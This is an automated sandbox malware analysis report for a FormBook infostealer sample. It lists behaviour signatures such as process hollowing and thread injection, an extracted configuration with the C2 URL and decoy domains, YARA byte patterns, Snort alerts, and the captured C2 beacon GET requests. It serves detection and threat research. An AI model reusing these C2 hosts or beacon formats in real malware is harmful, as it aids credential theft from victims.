Loading ...

Play interactive tourEdit tour

Analysis Report cryptedprof.exe

Overview

General Information

Sample Name:cryptedprof.exe
Analysis ID:356722
MD5:72efe20e4a59ae2722383b8786956994
SHA1:453b2af3b318668926087556eebfa93eda75d2df
SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cryptedprof.exe (PID: 6980 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
    • cryptedprof.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 984 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6592 cmdline: /c del 'C:\Users\user\Desktop\cryptedprof.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.cryptedprof.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.cryptedprof.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.cryptedprof.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.cryptedprof.exe.2a60000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.cryptedprof.exe.2a60000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: cryptedprof.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: cryptedprof.exeJoe Sandbox ML: detected
          Source: 3.1.cryptedprof.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.cryptedprof.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.cryptedprof.exe.2a60000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: cryptedprof.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: cryptedprof.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 4x nop then pop ebx3_2_00407AFA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx7_2_02C67AFB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.warungsuntik.com/rcv/
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.thatlocaljawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.warungsuntik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.tabandolano.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.thatlocaljawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.warungsuntik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.tabandolano.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thatlocaljawn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 14:32:22 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "601d0d01-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cryptedprof.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: cryptedprof.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmpString found in binary or memory: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004054B2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
